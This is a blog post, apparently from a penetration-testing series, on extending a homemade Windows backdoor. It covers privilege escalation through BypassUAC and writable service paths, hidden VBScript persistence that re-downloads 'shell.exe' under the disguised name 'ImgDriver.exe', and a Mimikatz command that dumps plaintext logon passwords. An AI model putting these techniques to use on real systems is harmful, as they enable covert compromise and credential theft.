This time we will implement a persistence feature for Windows operating system, but more on that later… as per the last post, I felt it was somewhat incomplete. So we will be starting off in simple fashion just to get back on track — it’s been a while — by making a privilege escalation function, then go on to the persistence section and to finish, we’re also taking a look at how to dump clear text passwords remotely. Let’s do this! 😉
It’s been a while since I last played with the code and although the last video accomplished what it set to, I wasn’t too happy with it. The whole process took some time and became very repetitive to do over and over… now don’t get me wrong, doing things manually will always teach you the most because you get to see how it actually works. However, having an automated version does have it’s benefits given enough testing is conducted.
For this reason I decided to give a go at automated functions for both privilege escalation and persistence (specifically for Windows, at this point; as I encounter more scenarios in which I need it for other operating systems, I will implement as I go). I will apologize now for the lack of testing. I only had a Windows Vista and Win7 box available during the programming of these functions, also my laptop’s VMs made it really laggy to deal with. However, I programmed it in a way that I believe should work with other versions (XP, Server, etc.) as well. I’d be happy if the reader(s) could possibly test it on their environment and see how it fares.
With that said, the first code I wrote was a simple download function to get a file from a url — this is useful because it is invoked inside of other functions in case let’s say, we need to download an exploit or whatnot. It can now be used with the following syntax:
Just replace the url and make sure it’s a direct link to the file, it will then download given file to current directory. I don’t think redirect downloads will work, but then again, I haven’t tried. If you do try it, let me know and I’ll update here!
On my last post, I showed you guys a method of getting SYSTEM access by adding a service and starting it using BypassUAC. This is cool, but we can only do such a thing under an administrator account. So I also linked Travis’ post on weak service permissions and how this could be used to escalate privileges from a standard user account.
In a nutshell, this could happen for many reasons. A standard user could manually change the settings to allow write access (sometimes without even knowing he’s doing so). Also I’ve been told that torrents require you to do such a thing when installing an application — which I though was very suspicious. In any case, you can read the whole article to get a better perspective.
I went ahead and wrote a function that attempts both methods to escalate privileges. If it detects an administrator account, it uses the BypassUAC method. If it’s a standard account then it will take a little longer and scan directories for write access… if it finds anything, it then reports back directories with misconfigured / improper permissions. Just like explained in the post by Travis, all that needs to be done is copy the backdoor’s *.exe file instead of the service’s original. Peep the video below. 😉
The persistence’s Visual Basic Script was based on the same one I used for “Automated Persistence on Metasploit” which if I’m not mistaken came from OMGSecurity, so credits go out to them. However, I completely modified it to do a few extra things:
- Check for the existence of the executable before executing it. This would raise an error which would most likely tip the client off to know something’s up. The code implemented was found from Stack Overflow.
- Added a function to download a file, also found on Stack Overflow. Note that this only happens when the original executable has been deleted.
- Added code to check for the executable’s attributes and the VBScript itself and see if the file is visible. If it is, change the attributes to hide the files. This way the files will only be seen if the user set the option to view hidden files, which comes set to “No” by default.
- Last but not least, modified the file some more to just sleep instead of raising an error in some occasions.
That’s basically it for persistence, you should know that it can be run in two different modes: simple and redown. If you just execute persistence without any arguments, like so:
This is the common persistence mode, it simply adds a registry and checks if the process is running, if it isn’t, it then executes it again. It also keeps the both files’ attributes as hidden. If the client finds the executable and deletes, then it’s done: game over. Now on to the redown mode:
C:\Users\Administrator\Downloads> persist [http://url.com/shell.exe] [C:\Users\Administrator\Pictures\ImgDriver.exe]
In this case, you can see we specify two arguments: a url that links to the file, and a new location. So if the administrator finds the executable inside the Downloads folder and deletes it, then the VBScript will redownload from the link specified straight to the new location, which is: C:\Users\Administrator\Pictures\ with the filename “ImgDriver.exe”. If you notice this happened, you can run the persistence again and specify a new directory. You can see how this becomes a really “annoying persistence”. LOL
Plain Text Passwords
We covered the privilege escalation, persistence, now to wrap this up we’re gonna check out how to use Mimikatz to dump plain text passwords from the client. Head over to the website and download the *.zip file — awesome work from Gentil Kiwi! This tool is very easy to use, no installation, just extract the correct version that matches the client’s PC architecture. In my case, x64.
Unfortunately for me, my french skills are pretty bad so I could get little out of the main page, or even the help screen from the application. I turned to Google to see if anybody had reviewed it in english and Voila’! Found two links, one from Pentest Monkey and another from room362, big thanks to both! Helped to clear out how to properly use it command line.
It’s simply a matter of uploading all of the files inside the correct folder to the client and executing it:
C:\Users\Administrator\Downloads> mimikatz.exe "sekurlsa::logonPasswords full" exit
Since my shell was already escalated to authority\system (service starts as system by default) and I had logged in as a standard user, it simply displayed that users credentials in plain text… saves the hassle of cracking the hashes.
[ UPDATE ]: Fortunately, the author of Mimikatz, Benjamin, emailed me and pointed out some finer points of his program. Not all files are needed to execute the program, just the ‘mimikatz.exe’ and correct syntax has been updated above.
Click here to download the server/client source code: [ DOWNLOAD ]
You can download mimikatz from the author’s website: [ Gentil Kiwi ]
Note: You MUST compile the client executable for testing in order to work.
That’s it for now, enjoy the video! 😉